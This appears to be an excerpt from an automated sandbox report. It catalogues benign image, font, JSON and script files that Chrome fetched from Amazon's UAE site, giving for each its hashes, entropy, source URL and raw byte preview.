                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4................................................................................................ 3......5........Z......................Ov.^/...f..e]..Y.+].0..&.d.o.c.@.................`.D.A..N.}.iN........1.....O.......................9..+...Kk..z.Pi.f.S...'.e|E.3.X'..#.z.a.y.v...{6i.rnV. .................+T.,1.4.'x..a.*M\.%.2.jW.2.4...D.A.p...(.........2.]...O.=.m..Z...............8..._/m....s....iy]0.L..w'.<...x..s..5.......v..(..QT..y..-..y.u..vU..C.+qi.D.............h.K.1z)p.Bf.Y....r....V...F...............^i.Q.:...7i....W.R......zJ...............|.../1:).9.......g^{.G..-.p..Pe1I_.......q..9N...v.....?E$uq~....}C...7`................ezm.....s>....j..s^.sh.K.Z4.W......<....L-.x6Z.O.v.N1.v:.v.,.S......................?J.z).[La`...B.Lh.!/.q..y......]..)`....................bc..6g.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2140
                                                                                                                                                                                                        Entropy (8bit):7.681064331721705
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:/85m2MxBSNmKeGioYpVBZOQrk/04c0hYaKBb:/8BSsNleGxYHOQrF4c0uZ
                                                                                                                                                                                                        MD5:40DFFE0C2A79542E7871C214C83B9389
                                                                                                                                                                                                        SHA1:8B7180263F4ADEBD0229A7CA24F058804E014EF8
                                                                                                                                                                                                        SHA-256:99FFE00914EC7C4911807777D032D34E7FCF0DB31E86BEDB7A90E7150CFE2D85
                                                                                                                                                                                                        SHA-512:C8636B35DF266BDB5CAA6FDDC60A91F7D27623EB74305850394BA17965AF1DE632C4F9B7ACC4BF51B5980E6FE2000B92414BEBE68FC92BD5A968D7FAE38CBED7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...................................................................................W.*...+B..X."e...l.......5...o|=.+....n...m.5........k.*....y~xKW..G..O.g.........d..j.Z.....-.z..?.2.l|.>.(....O.03.~`...r.eg..>...<.%.-.fU..M=..<}........fQ..{.A.8....N......t..o2......]t....<....<..............N...........................!t.."%12@Qq.$0A.......#456ars.......&37CPRSVcdu..........?...V...0.nrFi.y..9..l.w.#(...S."....2.aJ+1.....1.|M....j5y...Oua..8......5..1...S..BO.2.....m..j8..S.}..M-.%n.s..q.h.>9.U..Y..V..}.Z.2..(8..3.r.[3.J<..iv.[P..a.2C.h.~.77W.zXv....Y...Ur:3!..`..y....i7qE.R.:M..<..-<...q.hX.....9.P....Q..TP.t.-..Q`>,..J.......C.R...LT.*.......P=..Ll.g.Sj.(..vLa....^....]9...B.!m>.v7.......1>.5LZ_w+..]...&....?.s`........9.Q..b.NW`.....[{0...j...=cT^..=...Qc`s<........Q.k.u...+I..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4884
                                                                                                                                                                                                        Entropy (8bit):5.110039578593517
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:IdNQzriJcrCR9EbtGeSDOMA72y0uqYT40STfKAHSTfXAp4opU:IYzrIcuR9Ef+VACyA04fKAAXAp4opU
                                                                                                                                                                                                        MD5:FCDBA47CC50C1F1B7F1E78AA7B16BB7C
                                                                                                                                                                                                        SHA1:D7FD8DF139CA6A88D3AC6F9E20D6577276D3C1DE
                                                                                                                                                                                                        SHA-256:75D9DF2801626C6976BC622C722E2EF3FCE2F1C7D6827B71CB9BF0954FEFF7CE
                                                                                                                                                                                                        SHA-512:0DC97914DCA02024A639ECB2341707119D475AEF33234D2F5EFE21ABCBA3AB0C246A7B126826E2B0B4FD6DE976CB6771ADC108AB7E0D6B9F4316D79044EE6BFC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRN6H17wn-QSCi45d7vspX9sAAAGRVkJhBgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICDhmpvF%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-desktop-ad-center-1&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; to
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3712
                                                                                                                                                                                                        Entropy (8bit):7.864986086271164
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6UuK334yo9IlmByZtt9UUZOD9OJE0BYiZ05v1SUA0yZvawm/SUnfnWwX77lW:TjYPmcZtzra31SUyZ0YwFdP7QRYffW
                                                                                                                                                                                                        MD5:4704A4556E0EA0F7810959DB2DF6B8FA
                                                                                                                                                                                                        SHA1:ED40746E04294F386A808697EA0760E9A270E136
                                                                                                                                                                                                        SHA-256:BD53B37D2F510CF123443C40FD8D0DEFA0420C9C08452958FB784C7B32612CEC
                                                                                                                                                                                                        SHA-512:1C3D6DCB818FDF424F64C1A034B9C4CD6EABEA6A394DCFD8927D7D202D1491940547E3AA897D6443FF27244786194D59EE84936359CE66188446008A3937B1F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!"1..Aa..2Qq...4Bb....3.#Rr.................................................!1.."2.Aaq#Q.............?..U)J.JR.R....(.)J.JR.R..qw.....>....J.<....1_l..EE..o..!>.i.K.\{mn..-..)!r..@.yVoA]..JR.R....(.)J.JR.R....(.)_.n..A'i....@. P.u....&..o...PJ..}.Z..J.....v.....y.&l/.&.y..?..5J....,ZKZ.E.T.qQ....i.t..s.)n3......n.{......w.....j.M.#|..!.....p.3[5......i..\ !cf\.lo..57j........x....D..Y.&u..Ir.|&br63.<`..T......]H..i..........75e.Y&.@..)h..W....E.}.k..e..6WN...vq.9..Xp.:.+..vj..2.G.|?k......(I.a...:N.8e ..O.f..G.6...Ex..%.4.N7.p.).).,.wq..M^..2m&.s....)J.)@)JP.R......+...M...Y...p{..Q...B.B..Z.D...|.....d@.~.*j..4.nyY...'..h....-..._.rB......C..|.Ob....2..xV.....,d...X..or..`}.$._<...#Z...H.!....... (bj...h..Z.n..6..H......./'.x.%>I.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 29240, version 1.19661
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):29240
                                                                                                                                                                                                        Entropy (8bit):7.993601718527624
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:dvnevMz5ECZBDoo0NmEMZAqg5rEwfHnkb:BPZBDoOhZNErECHkb
                                                                                                                                                                                                        MD5:C58D60F633A61A473A746505B4373194
                                                                                                                                                                                                        SHA1:32110B329B0FF64B386960BCEC4E61964EDEAA17
                                                                                                                                                                                                        SHA-256:823E37B5143B1B90333E54B872BDB8D40B9F12AD98547D30874FA6350D09A9F3
                                                                                                                                                                                                        SHA-512:800F34827D7913082944F2F3C58D978CB58042B4C198A0CBD773D676245281D17DC58246BDA9F75504C340C19AA5E5B603BC790184F4FD3655319BAA56720343
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/ozb5-CLHQWI6Soc.woff2
                                                                                                                                                                                                        Preview:wOF2......r8......I8..q...L.......................z......x.`..J.........d..L.6.$..4..\.. ..8. ..[.'q...6.D....2u{..9..6...g.h......a..H.=;......2..A....d..d..K..1*.t.9.t.D.../r.p...c.n...27.0...&.<H.ye.7.=y..H..2-.../}.S.y..6.&...F.$.o.*........Th?.K.o...FB.&...aC...NW.v'...m..e.Y<Sq..I...M..._.}.....+.).F.9KP._R.."aE].ox..E`..G..........>y.I.+J .d..V....4.m%...5.,........{...ED.B.`.1.....NW.9.1.."\T......E.@..bv........H.6i;.@...lS..K..U..j...#.r.f.1.Y.b.0.8.."&....rz...Y.m.:P*JRQ...Z.....jf^.@...i...i.O\...^...J.P......l/.?g.a_3...q...a.!h....x./..M&...}.W&..H.I%.@.p......9.`@C...H.P@..QT.|Q9...7..P......7A,.B^B..'..Z.M..s..N.(b:v...nC*.i...E.E..i..iK5.......?.G.O.m..1...W......+m'.0~.o....+.cG..m>..3.!-.LV.S#...l..^oC...>g.s...G........juHE.p.,t...D..........AL@...t.}o..>a...>.j.....%gO\8....($.?...r..t..ILBZ.@'..6...C,...6.v...Hc.#.MP..V.qY..a$....h74;&Rd".e.n.K.K....@....4TM..O.........r.B4fvI.0<....z.....44).$.{....z..9X.AF....A.p
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14622
                                                                                                                                                                                                        Entropy (8bit):7.867458077991927
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Lj0bACI6nRAvBhrvBQlD6AE3WJ32D8arKXoKyDuadeLYM:cbLIXBh9kQWJ2QoKuuiesM
                                                                                                                                                                                                        MD5:C60A77B8880BF976B06488D12FEA13E3
                                                                                                                                                                                                        SHA1:07E14DFA0BF56E0BCE2EEDAC999878F8DFD3528B
                                                                                                                                                                                                        SHA-256:A2CD8FA5065A7F5AD75077D385983389DFE212E31D8393EF28D1D7673A3E6CC9
                                                                                                                                                                                                        SHA-512:9CE72741205EB6553031DEFCD42F1BCABC9977C2EAEA99BC41A7928BFBBBE1293B9F4DE526571FFCED40EE12C36EAD22B270DD4448FB8D43C1DCA4314438717E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF................................................................"!!!"&&&&&&&&&&........... ... &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......................4.........................................................................H....: + ...............O.....?l<.NdW.....<v.|w=..............R..w.Z.uK.>......U...I.t.l..<................GN2...W.]. ...0.N...;Y.w.7}|..........%..p...uo. ......."R................S...z.?^.z$.........u...D.5........,.y...............F..M...QP......9..... ..........6..uZ.y.......!...<..~=.................5.su.d.......eoj.................[....0.....yl... .............D...N.=f.....j...PH......Z..O.d........z.LY.t*...[............9r.k..{.l.$|}........u.a..=p..._3f2..@...."<.G+.3.h.=qIls......."N...O...!....c..R.....[1.w.=.?`!...w..s)...#.....`.(..c.7=<. .!.f..U......./.S.._.hi.H.,R.c^.....<C..A...qSB..$.g..X...=.x.JH.....B.G..`..~.A.`!I.s.....U..K.Gw.....Z...+.....z}.OZ..u .;M......Zz..v.P.....Zx.,y.;...).+.?.....;._.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 213x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11832
                                                                                                                                                                                                        Entropy (8bit):7.959588886949231
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:oEOR05NsT7nQjPL9b36T+WlUyLw9267BP9abW2pF19ARRtj0cFc3a0y+W/GTOe:oEQ05c7QPlKBz6sHF19ARRF0cSDy+kle
                                                                                                                                                                                                        MD5:44AEF71A3380C0D38C108ED757D256E6
                                                                                                                                                                                                        SHA1:A5BC06F43181E4B6C18868DF662A60492D91F6AF
                                                                                                                                                                                                        SHA-256:18B20FD5DBB795C53BCFF747F5FA365E3DCE19880A09780BE7BBCB2B4959A758
                                                                                                                                                                                                        SHA-512:F593D23518AE88D3D210EBDC65DC63CAB13403882FF598A171474B7BDB2A5E9292E1BF7B04E7B535EDCC098E537DD776FDFEAA55EC8F249AAFB9BB57BB204413
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.A."2Qaq.#R......3Br.S.$4Tbc...C............................................................!12AB..aq..............?..tQE.E.P.QE.E....Z..Fn.b.{.c.H.E..^...]F..R..Y.H...P..PK.N=)o._.O.(&....)Ys..../u.4.../.'...../q.B=g6.g.p..!.A....H....,.d ......g......?s....G.7.y...X.`.............~9....gU.......s.....~.....=/k............j.I.gP.B.h.. |.a...==f..t.G..UW......g..i...z~..S].D.t.......a.b.*..};...{.!.$.....VB.9..jVw.x.Y..U......Fj...f8!......!sZs.F3T..{..2..30..|...D..1y.=.....X."..52C.'.,..E.k..F#.....W9.fa..I..&m.y.Y.k.n_P....g.A.@............*O.......W...[j....6Q..`G.H. .lt..2*C..R.8fs....TA.]...q....1....{.?f\o.l.on..i_TW./V.....e..U....S....E.P.QE.E.P|.d..IX" %..UP9$....N...z[C%..d.KU.A.HJB.s.3zCXz..}:vqa..yv.A4....<|....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9729
                                                                                                                                                                                                        Entropy (8bit):7.933093509303515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:9vHBw5hQhAWHJA8Io77vzSm+XvE18zRRO7GqpM610qJG/jkFFHc:9vhwFQ+8z777wE1wRROSW10vyHc
                                                                                                                                                                                                        MD5:7D01A3DAF3A14BB9947FE0674E467BC9
                                                                                                                                                                                                        SHA1:785A8F314122793B2A5F10A13581672ED71E9ABD
                                                                                                                                                                                                        SHA-256:9AB37178BAEF86FE67DE5D1E0FE56B24272DF1DB736A4EA4DBD8DB0092227B70
                                                                                                                                                                                                        SHA-512:88BB349FEF3E1009788400B33A39223CDCE52BA0B66EF7AFF16C907EB31832218CD6BBD49665451426ECCCCF000FE62E8BCBB797162BCDADA4F2524864E92119
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71tGQq+WtwL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........2...............................................................].Fhg...+..&L....g....S.....0.p..IX...c....[O+=.<,..<.CY...MA.....j.8.T.*e.A:.....)6A.7......w%t,EuK2.B...E.=./o.).M|.a...`Lj..A.f2..y....b".a.NYD!I..BJ..I..K.CfT.Y..I.!RmHT.R.."..i...".....C..y.,....W.u..r..OD!Z...+.<z5....D.`QA....G4F..U.5b.C.K....+.w..;.7.G..W.-P.L1.B.U.pkb#,.L...m........sf...9ka..8DsD..jv.i......>z...........uN.o.)\...j...=..s/.^X.t.....F...>..9".z.q#}...].5...F.Dc.b..%.L..0...I.Qz!' ..0.V....$.#......=+.u./*l.]R.H.(.OE..`.....F..>.].5s\... .0+.J.e.G.G......=U..).2......../....e..O...n6]..x.l..........:.../.P..A.9..U.`'.K..-..$..).6........6.Sq..7...v..F.".S....._..P.[C.[.!..Z..5....n...`.X ....l.. a.Z.oi...g..z..9QD..a...0......8..W02...\j=...A`......w...].w....aq.....T.~5.D.#HPA...F......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3241
                                                                                                                                                                                                        Entropy (8bit):7.853920669258003
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T7dv4df+7eeeKlKwnsz6G0JUkRgPN/12Fwr8NvhKD:Hdv4d8eMlKfmG0GPR1CwITKD
                                                                                                                                                                                                        MD5:0D3E3C8112888804694EBF399BC8B00F
                                                                                                                                                                                                        SHA1:9BD8217B984A51E9D12A7268B00650DA6D28E6D1
                                                                                                                                                                                                        SHA-256:99AD2348330ECEB8B6B7609CB0BE8313ADF29A89433F08330543D1281565E2F9
                                                                                                                                                                                                        SHA-512:B76A285CB1E614265017A847A62C4C77757377AC3896FE451E9C9B69124A23E646156C3341948450AAC8991EF5212FF9446EACD0B1F1F4B11CF144C62B09EDBF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712472_372x232_2X_en_AE._SY116_CB560039169_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1A.Qa."q...2Bb....R..#3D...Scr.................................................!1.."qQa............?...bDD.D@K...>..T..r....Ke..".v....9SW.Z._....g9.].R..!)R$...._..&R....k..9m.....6..4.}2..........?0%.qu....k.M..k%.....+8...ulN.q.G.1L.x......e."%..4.ok...B...u^.u.JP.2..w}...NXom<QR.?.z.K}.....)\H.b.}.....{V..-^...%..!..dS...f...K,.Q5..I..." ""." ""." "".i.(../o<p...T\.-..~...I.i..MV.H..W.....Q./.g.=..3.*q..3.nj...U..pTU.O.ppX...fNi."....i....!5.E-.s+........y0veE.......+..8{..^..R.<..K`...c......]..".u...6s2v.....w#B.^.*.....9...T.Ce..8...rO:3...f..tm&..m..Zw.Qh..uu..@l........G.KF@2..2z..}y.....;.[R........*.;. ..:.'9.qr+=..8v.b..hp.....*......P"l9..........u..a:.zM{T....L...<...m7.i.q..*..g_."&.r" ""." ""." '?.V..[...J..#.).^.Y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):521
                                                                                                                                                                                                        Entropy (8bit):5.173468454820399
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:21+uZ/PqWI/cuT2HLpog8AlMJ5PIlcmm1PRh:21nZ/PCnTaL2LAWJ5NxRh
                                                                                                                                                                                                        MD5:C043EEC9FC9735799701A0AEB64C1569
                                                                                                                                                                                                        SHA1:A4A4FCA8C35CD12206BF915CBA1AA0075E436AB6
                                                                                                                                                                                                        SHA-256:432DFF2BD6F663C6151A5947FA318A46463085D4F6E40761450E8B38FD0FE938
                                                                                                                                                                                                        SHA-512:3C8A4CC2A71AF95B8CA4B6FEA967D70A717503654FDA01E0B5E170E9ACD59530F41C7D84F6DB626355347B9D95D5461A43E6CCE4284D2AE60970E80114BF2A1F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01wGDSlxwdL.js?AUIClients/AuthenticationPortalInlineAssets
                                                                                                                                                                                                        Preview:(function(a){var d=window.AmazonUIPageJS||window.P,e=d._namespace||d.attributeErrors,b=e?e("AuthenticationPortalInlineAssets",""):d;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,d,e){a.when("A","ready").register("cross-domain-sso",function(b){var c=b.state("central-identity-provider-state");if(c&&c.sloDomainsToPing&&Array.isArray(c.sloDomainsToPing))for(var c=c.sloDomainsToPing,a=0;a<c.length;a++)0<c[a].length&&b.post("https://"+c[a]+"/ap/sso/clear",{withCredentials:!0})})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 512 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):22428
                                                                                                                                                                                                        Entropy (8bit):7.910842269862625
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qlbGl6f7R7T7rLr3s96g/W1BapndUdH6Qu3pDm+RaHHhKTOl1uk5xs:Lm7R7r/3pWW6pnudH6Qu5CZhKTA0+i
                                                                                                                                                                                                        MD5:BE418CBD22D8CD432FD8F3F6AE2ABD76
                                                                                                                                                                                                        SHA1:8A1EB36BDA141942C27CE5F2586CCB5EE17A2DA3
                                                                                                                                                                                                        SHA-256:F95648CD95B78DE088904519725C67FFF220F589DC045F19FFBA21550450409F
                                                                                                                                                                                                        SHA-512:85A442470444250A639C86753F1E9D3DC8C308D9F173C250CFEDACD8A1E16F4E3419DA0C7A6F19695CF6D1C25964B54E4FEE4193EED183B41C9E6043BDB827E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/ZpbG74laklgnz-i.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............N>U....PLTEGpL................79.78....... ;.(=..........+m.2I..;..$.qI.4:....%<. ;hjjcdehkkfiifiifhh.....@2?..?T..gjj...H.*l.O..>...O./;.2...ARB..............>N....>............:..D.).......................T..U$..(../.. ..$..$................*..,...........$..#..#..#..#..$..#..#..#........#..$..&............)}.)}.)}.)}.)}.)}.)}.)}.)}.)}.JI..H..K..K...<..vH..H...<...$*/......@@@...)1<......BGL...RUX...mxx.........`..K...<.E...%..C..X.D..w........<....uR.-<>A#/>:?C"$';>A;?C...-8D<?C8>C>@C$..............:>B;@D......&{..p.;...........$........................i......@?._I..W.....Q.G6.G6.G6.H6..-.ul.`.6d...........................................?@A?@A...3>H......V........#...vg.8!."....'..7.....@.....D..%.f%.f....^..]..].;........(......].......g...hV....tRNS.....sy..V..*..!1d..L...;.\v..D.....o.yo.N..o..'\.<{3...5..a..?...X(.......H.7P..h.........w....t....[..B...........................h...............*.`...@.....qQ......1.I..we..\....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 126x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9203
                                                                                                                                                                                                        Entropy (8bit):7.954863681191278
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:glHFrpt5KUfkxctYHZBMpH9Wda2P7KiVOyJ+:sPt5KUfTi66fDrVOG+
                                                                                                                                                                                                        MD5:68EB8595D081CF4B7EA0D63ED08EED84
                                                                                                                                                                                                        SHA1:F47590FC6293EC2EF5B7460545DF64112E76EAFD
                                                                                                                                                                                                        SHA-256:4134D9EA47F8E53290973E4EEBA321B46EBD627E174D6FCB266D97F7C006D708
                                                                                                                                                                                                        SHA-512:83F1B9B1C9FBE4D8BAC64037C0D2A30A661D8FC90E2200BD9626C41C1EDFEA35CBD470308B6D2EA29882F79AA3FE9C1BD037558887448CD5BB10F9692C6BBF07
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81-cKwx9+lL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!..1"A..Q#2Raq..Bb..3r..$Cc..5.s.................................................!.1..A"2Qa...q.........B............?..z4h.....:...z..V.f*....>..5....nS.W...UP=m.N(].#......P..=6...K...].........]..M.P.C.b0g~.*W_W.<...}7...&....O...L..OF..<UqU..=.6......Fy......q.<[......f..QF..4..1..*Y.....`.h.....=.d..0....d..8b..l...B.V.....s.Z...9.Vcp...3,;....0...%O...-..Y.........}..+IJ?PP"0_s.}F..4....3.{Q4...F.E._.".pn....,.{E..8.@.2!.uW.........F...m.!..w}..0.3.V..q....W.^9.......vtu........7.#x.J..M.o.C9Q..*Q.<.......nQ.i...nR".O!......o......B.N.v.....S....o....8[H.?...U..N.r..Y.........n....Q.....M.4..zO.=mI4.OZ..... .M... _-s...7..&.j..H....n...$!..rB./.....:.i..t.y.<.;.M....p;..vh.0Yn.\N......0\...._r...>...#..O......&hh..[...L.8/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4343
                                                                                                                                                                                                        Entropy (8bit):7.910105969959965
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TmbtbFE66jfm++yVJozJupaz7i4Z/oYeW1q6TgpDF67:qbtbe3VyzJup0i4ZRj1gpDFM
                                                                                                                                                                                                        MD5:312209B764DFCEBAA32CCEE6EEDD1F29
                                                                                                                                                                                                        SHA1:73067B74F112A032C91D6978BA1A60034E140029
                                                                                                                                                                                                        SHA-256:7431B3E875E0F31B91BC167DA88599904C6F040F207560E776AA519AB405AEF1
                                                                                                                                                                                                        SHA-512:3D3F96EDFF3BE6DAC8C01E8E2E0C0BD73F2F9AB38CF999213CBA1F7B3A29C30FC313403EDD76F6DA52C8569AF4F5BA80B4939D272C97F58930C26C786F80D387
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.."1AQ2t...#aqs......%Rr......45Td...$6BSb...CU................................................1!A.2..".QR............?.&.7....76.F.%|...3l....Nm.:..o....x.X..i:9|..V....~.@.L..Nmd?...`..]...R.3./......*,....Q.Z.t....*...H.....v....H.).[.XF....u..X..X......W....P.h.....$Y".3......2(M.j....U%...M:Q.6.+.kg...^.J.R.. .n..[i.3.d.tG..%.N.H...$c.....&.S.P.Uf....4..$.5.5X....8(..1.]....5f..Z.{k..jD++za8O.m<*.|.*.j;9Qs.6Y..[Zh.'..U.d...7} .Gx.$r+...8.+.5..L.}.o...*.lY....{.N....|.....|..3...y.......uU/$...;.........f..........[.5........h.sF_|?%..k .......Z.[..S...Q.....2.....{.P.".8..T.)W.+M.M<./Z...I.p...C^.s.j......QSB.Xt.&+.D....r......h].U..z...5of.r.....VVN.}.....B.m..2....]8.l. ..!.S.v$H..dc....w.........T.T.L...M....7Z..k2
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10427
                                                                                                                                                                                                        Entropy (8bit):7.962248716829095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:3ITcYnu+XzI2xIZr7PdVsYanDK5Ygz7QM6BjxoYysk4aIFaErepSt4ziUxn:3Ixu+XzXx+dV/anD0QMSFoYys3afErQ7
                                                                                                                                                                                                        MD5:D009DD402EA4CB2EFFFFCD816B0EB8A0
                                                                                                                                                                                                        SHA1:038C58EDA65E6D88931B87BE9A0F67FDDA64E32D
                                                                                                                                                                                                        SHA-256:17F82AF309321290CE8DBB5A26D874C4929AE4E3E71396A96FFE57798BB15A55
